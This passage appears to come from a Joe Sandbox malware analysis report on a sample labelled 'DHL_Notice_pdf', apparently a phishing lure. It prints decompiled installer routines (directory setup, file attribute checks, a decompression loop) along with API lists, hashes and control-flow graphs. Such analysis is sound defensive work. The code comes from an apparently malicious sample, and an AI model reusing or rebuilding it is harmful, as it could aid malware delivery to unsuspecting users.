                                                            									goto L9;
                                                            								}
                                                            							}
                                                            						}
                                                            						 *_t34 = _t31;
                                                            						_t32 = _t34 + 2;
                                                            					} while (_t31 != _t28);
                                                            				}
                                                            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                            					_push(0xfffffff5);
                                                            					E00401423();
                                                            				} else {
                                                            					E00401423(0xffffffe6);
                                                            					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                            					if(_t23 == 0) {
                                                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                            					}
                                                            				}
                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                            				return 0;
                                                            			}












                                                            APIs
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                              • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                            • API String ID: 1892508949-501415292
                                                            • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                            • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                            • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                            • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 673 40603f-40605a call 406668 call 405fe2 678 406060-40606d call 4068ef 673->678 679 40605c-40605e 673->679 683 40607d-406081 678->683 684 40606f-406075 678->684 680 4060b8-4060ba 679->680 686 406097-4060a0 lstrlenW 683->686 684->679 685 406077-40607b 684->685 685->679 685->683 687 4060a2-4060b6 call 405f37 GetFileAttributesW 686->687 688 406083-40608a call 40699e 686->688 687->680 693 406091-406092 call 405f83 688->693 694 40608c-40608f 688->694 693->686 694->679 694->693
                                                            C-Code - Quality: 53%
                                                            			E0040603F(void* __eflags, intOrPtr _a4) {
                                                            				int _t11;
                                                            				signed char* _t12;
                                                            				long _t16;
                                                            				intOrPtr _t18;
                                                            				intOrPtr* _t21;
                                                            				signed int _t23;
                                                            
                                                            				E00406668(0x425f50, _a4);
                                                            				_t21 = E00405FE2(0x425f50);
                                                            				if(_t21 != 0) {
                                                            					E004068EF(_t21);
                                                            					if(( *0x42a278 & 0x00000080) == 0) {
                                                            						L5:
                                                            						_t23 = _t21 - 0x425f50 >> 1;
                                                            						while(1) {
                                                            							_t11 = lstrlenW(0x425f50);
                                                            							_push(0x425f50);
                                                            							if(_t11 <= _t23) {
                                                            								break;
                                                            							}
                                                            							_t12 = E0040699E();
                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                            								E00405F83(0x425f50);
                                                            								continue;
                                                            							} else {
                                                            								goto L1;
                                                            							}
                                                            						}
                                                            						E00405F37();
                                                            						_t16 = GetFileAttributesW(??); // executed
                                                            						return 0 | _t16 != 0xffffffff;
                                                            					}
                                                            					_t18 =  *_t21;
                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                            						goto L1;
                                                            					} else {
                                                            						goto L5;
                                                            					}
                                                            				}
                                                            				L1:
                                                            				return 0;
                                                            			}










                                                            APIs
                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00406098
                                                            • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004060A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: P_B
                                                            • API String ID: 3248276644-906794629
                                                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 696 407194-40719a 697 40719c-40719e 696->697 698 40719f-4071bd 696->698 697->698 699 407490-40749d 698->699 700 4073cb-4073e0 698->700 703 4074c7-4074cb 699->703 701 4073e2-4073f8 700->701 702 4073fa-407410 700->702 704 407413-40741a 701->704 702->704 705 40752b-40753e 703->705 706 4074cd-4074ee 703->706 707 407441 704->707 708 40741c-407420 704->708 711 407447-40744d 705->711 709 4074f0-407505 706->709 710 407507-40751a 706->710 707->711 712 407426-40743e 708->712 713 4075cf-4075d9 708->713 714 40751d-407524 709->714 710->714 716 406bf2 711->716 717 4075fa 711->717 712->707 718 4075e5-4075f8 713->718 719 4074c4 714->719 720 407526 714->720 721 406bf9-406bfd 716->721 722 406d39-406d5a 716->722 723 406c9e-406ca2 716->723 724 406d0e-406d12 716->724 726 4075fd-407601 717->726 718->726 719->703 727 4074a9-4074c1 720->727 728 4075db 720->728 721->718 729 406c03-406c10 721->729 722->700 732 406ca8-406cc1 723->732 733 40754e-407558 723->733 730 406d18-406d2c 724->730 731 40755d-407567 724->731 727->719 728->718 729->717 734 406c16-406c5c 729->734 735 406d2f-406d37 730->735 731->718 736 406cc4-406cc8 732->736 733->718 737 406c84-406c86 734->737 738 406c5e-406c62 734->738 735->722 735->724 736->723 739 406cca-406cd0 736->739 744 406c94-406c9c 737->744 745 406c88-406c92 737->745 742 406c64-406c67 GlobalFree 738->742 743 406c6d-406c7b GlobalAlloc 738->743 740 406cd2-406cd9 739->740 741 406cfa-406d0c 739->741 746 406ce4-406cf4 GlobalAlloc 740->746 747 406cdb-406cde GlobalFree 740->747 741->735 742->743 743->717 748 406c81 743->748 744->736 745->744 745->745 746->717 746->741 747->746 748->737
                                                            C-Code - Quality: 99%
                                                            			E00407194() {
                                                            				signed int _t530;
                                                            				void _t537;
                                                            				signed int _t538;
                                                            				signed int _t539;
                                                            				unsigned short _t569;
                                                            				signed int _t579;
                                                            				signed int _t607;
                                                            				void* _t627;
                                                            				signed int _t628;
                                                            				signed int _t635;
                                                            				signed int* _t643;
                                                            				void* _t644;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					_t530 =  *(_t644 - 0x30);
                                                            					if(_t530 >= 4) {
                                                            					}
                                                            					 *(_t644 - 0x40) = 6;
                                                            					 *(_t644 - 0x7c) = 0x19;
                                                            					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                            					while(1) {
                                                            						L145:
                                                            						 *(_t644 - 0x50) = 1;
                                                            						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                            						while(1) {
                                                            							L149:
                                                            							if( *(_t644 - 0x48) <= 0) {
                                                            								goto L155;
                                                            							}
                                                            							L150:
                                                            							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                            							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                            							 *(_t644 - 0x54) = _t643;
                                                            							_t569 =  *_t643;
                                                            							_t635 = _t569 & 0x0000ffff;
                                                            							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                            							if( *(_t644 - 0xc) >= _t607) {
                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                            								_t628 = _t627 + 1;
                                                            								 *_t643 = _t569 - (_t569 >> 5);
                                                            								 *(_t644 - 0x50) = _t628;
                                                            							} else {
                                                            								 *(_t644 - 0x10) = _t607;
                                                            								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                            								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                            							}
                                                            							if( *(_t644 - 0x10) >= 0x1000000) {
                                                            								L148:
                                                            								_t487 = _t644 - 0x48;
                                                            								 *_t487 =  *(_t644 - 0x48) - 1;
                                                            								L149:
                                                            								if( *(_t644 - 0x48) <= 0) {
                                                            									goto L155;
                                                            								}
                                                            								goto L150;
                                                            							} else {
                                                            								L154:
                                                            								L146:
                                                            								if( *(_t644 - 0x6c) == 0) {
                                                            									L169:
                                                            									 *(_t644 - 0x88) = 0x18;
                                                            									L170:
                                                            									_t579 = 0x22;
                                                            									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                            									_t539 = 0;
                                                            									L172:
                                                            									return _t539;
                                                            								}
                                                            								L147:
                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                            								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            								_t484 = _t644 - 0x70;
                                                            								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                            								goto L148;
                                                            							}
                                                            							L155:
                                                            							_t537 =  *(_t644 - 0x7c);
                                                            							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                            							while(1) {
                                                            								L140:
                                                            								 *(_t644 - 0x88) = _t537;
                                                            								while(1) {
                                                            									L1:
                                                            									_t538 =  *(_t644 - 0x88);
                                                            									if(_t538 > 0x1c) {
                                                            										break;
                                                            									}
                                                            									L2:
                                                            									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                            										case 0:
                                                            											L3:
                                                            											if( *(_t644 - 0x6c) == 0) {
                                                            												goto L170;
                                                            											}
                                                            											L4:
                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                            											_t538 =  *( *(_t644 - 0x70));
                                                            											if(_t538 > 0xe1) {
                                                            												goto L171;
                                                            											}
                                                            											L5:
                                                            											_t542 = _t538 & 0x000000ff;
                                                            											_push(0x2d);
                                                            											asm("cdq");
                                                            											_pop(_t581);
                                                            											_push(9);
                                                            											_pop(_t582);
                                                            											_t638 = _t542 / _t581;
                                                            											_t544 = _t542 % _t581 & 0x000000ff;
                                                            											asm("cdq");
                                                            											_t633 = _t544 % _t582 & 0x000000ff;
                                                            											 *(_t644 - 0x3c) = _t633;
                                                            											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                            											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                            											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                            											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                            												L10:
                                                            												if(_t641 == 0) {
                                                            													L12:
                                                            													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                            													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                            													goto L15;
                                                            												} else {
                                                            													goto L11;
                                                            												}
                                                            												do {
                                                            													L11:
                                                            													_t641 = _t641 - 1;
                                                            													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                            												} while (_t641 != 0);
                                                            												goto L12;
                                                            											}
                                                            											L6:
                                                            											if( *(_t644 - 4) != 0) {
                                                            												GlobalFree( *(_t644 - 4));
                                                            											}
                                                            											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                            											 *(_t644 - 4) = _t538;
                                                            											if(_t538 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                            												goto L10;
                                                            											}
                                                            										case 1:
                                                            											L13:
                                                            											__eflags =  *(_t644 - 0x6c);
                                                            											if( *(_t644 - 0x6c) == 0) {
                                                            												L157:
                                                            												 *(_t644 - 0x88) = 1;
                                                            												goto L170;
                                                            											}
                                                            											L14:
                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                            											_t45 = _t644 - 0x48;
                                                            											 *_t45 =  *(_t644 - 0x48) + 1;
                                                            											__eflags =  *_t45;
                                                            											L15:
                                                            											if( *(_t644 - 0x48) < 4) {
                                                            												goto L13;
                                                            											}
                                                            											L16:
                                                            											_t550 =  *(_t644 - 0x40);
                                                            											if(_t550 ==  *(_t644 - 0x74)) {
                                                            												L20:
                                                            												 *(_t644 - 0x48) = 5;
                                                            												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                            												goto L23;
                                                            											}
                                                            											L17:
                                                            											 *(_t644 - 0x74) = _t550;
                                                            											if( *(_t644 - 8) != 0) {
                                                            												GlobalFree( *(_t644 - 8));
                                                            											}
                                                            											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                            											 *(_t644 - 8) = _t538;
                                                            											if(_t538 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												goto L20;
                                                            											}
                                                            										case 2:
                                                            											L24:
                                                            											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                            											 *(_t644 - 0x84) = 6;
                                                            											 *(_t644 - 0x4c) = _t557;
                                                            											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                            											goto L132;
                                                            										case 3:
                                                            											L21:
                                                            											__eflags =  *(_t644 - 0x6c);
                                                            											if( *(_t644 - 0x6c) == 0) {
                                                            												L158:
                                                            												 *(_t644 - 0x88) = 3;
                                                            												goto L170;
                                                            											}
                                                            											L22:
                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            											_t67 = _t644 - 0x70;
                                                            											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                            											__eflags =  *_t67;
                                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                            											L23:
                                                            											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                            											if( *(_t644 - 0x48) != 0) {
                                                            												goto L21;
                                                            											}
                                                            											goto L24;
                                                            										case 4:
                                                            											L133:
                                                            											_t559 =  *_t642;
                                                            											_t626 = _t559 & 0x0000ffff;
                                                            											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                            											if( *(_t644 - 0xc) >= _t596) {
                                                            												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                            												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                            												 *(_t644 - 0x40) = 1;
                                                            												_t560 = _t559 - (_t559 >> 5);
                                                            												__eflags = _t560;
                                                            												 *_t642 = _t560;
                                                            											} else {
                                                            												 *(_t644 - 0x10) = _t596;
                                                            												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                            												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                            											}
                                                            											if( *(_t644 - 0x10) >= 0x1000000) {
                                                            												goto L139;
                                                            											} else {
                                                            												goto L137;
                                                            											}
                                                            										case 5:
                                                            											L137:
                                                            											if( *(_t644 - 0x6c) == 0) {
                                                            												L168:
                                                            												 *(_t644 - 0x88) = 5;
                                                            												goto L170;
                                                            											}
                                                            											L138:
                                                            											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                            											L139:
                                                            											_t537 =  *(_t644 - 0x84);
                                                            											L140:
                                                            											 *(_t644 - 0x88) = _t537;
                                                            											goto L1;
                                                            										case 6:
                                                            											L25:
                                                            											__edx = 0;
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												L36:
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) = 1;
                                                            												 *(__ebp - 0x84) = 7;
                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            												goto L132;
                                                            											}
                                                            											L26:
                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            											__esi =  *(__ebp - 0x60);
                                                            											__cl = 8;
                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            											__ecx =  *(__ebp - 0x3c);
                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            											__ecx =  *(__ebp - 4);
                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											if( *(__ebp - 0x38) >= 4) {
                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                            													_t98 = __ebp - 0x38;
                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                            													__eflags =  *_t98;
                                                            												} else {
                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            												}
                                                            											} else {
                                                            												 *(__ebp - 0x38) = 0;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                            											if( *(__ebp - 0x34) == __edx) {
                                                            												L35:
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												goto L61;
                                                            											} else {
                                                            												L32:
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__ecx =  *(__ebp - 8);
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            												goto L41;
                                                            											}
                                                            										case 7:
                                                            											L66:
                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                            											if( *(__ebp - 0x40) != 1) {
                                                            												L68:
                                                            												__eax =  *(__ebp - 0x24);
                                                            												 *(__ebp - 0x80) = 0x16;
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            												__eax =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                            												__eflags = __eax;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L69;
                                                            											}
                                                            											L67:
                                                            											__eax =  *(__ebp - 4);
                                                            											__ecx =  *(__ebp - 0x38);
                                                            											 *(__ebp - 0x84) = 8;
                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            											goto L132;
                                                            										case 8:
                                                            											L70:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xa;
                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x38);
                                                            												__ecx =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                            												 *(__ebp - 0x84) = 9;
                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            											}
                                                            											goto L132;
                                                            										case 9:
                                                            											L73:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												goto L90;
                                                            											}
                                                            											L74:
                                                            											__eflags =  *(__ebp - 0x60);
                                                            											if( *(__ebp - 0x60) == 0) {
                                                            												goto L171;
                                                            											}
                                                            											L75:
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                            											__eflags = _t259;
                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                            											goto L76;
                                                            										case 0xa:
                                                            											L82:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												L84:
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xb;
                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            												goto L132;
                                                            											}
                                                            											L83:
                                                            											__eax =  *(__ebp - 0x28);
                                                            											goto L89;
                                                            										case 0xb:
                                                            											L85:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__ecx =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x20);
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x24);
                                                            											}
                                                            											__ecx =  *(__ebp - 0x28);
                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            											L89:
                                                            											__ecx =  *(__ebp - 0x2c);
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            											L90:
                                                            											__eax =  *(__ebp - 4);
                                                            											 *(__ebp - 0x80) = 0x15;
                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            											goto L69;
                                                            										case 0xc:
                                                            											L99:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L164:
                                                            												 *(__ebp - 0x88) = 0xc;
                                                            												goto L170;
                                                            											}
                                                            											L100:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t334 = __ebp - 0x70;
                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t334;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											__eax =  *(__ebp - 0x2c);
                                                            											goto L101;
                                                            										case 0xd:
                                                            											L37:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L159:
                                                            												 *(__ebp - 0x88) = 0xd;
                                                            												goto L170;
                                                            											}
                                                            											L38:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
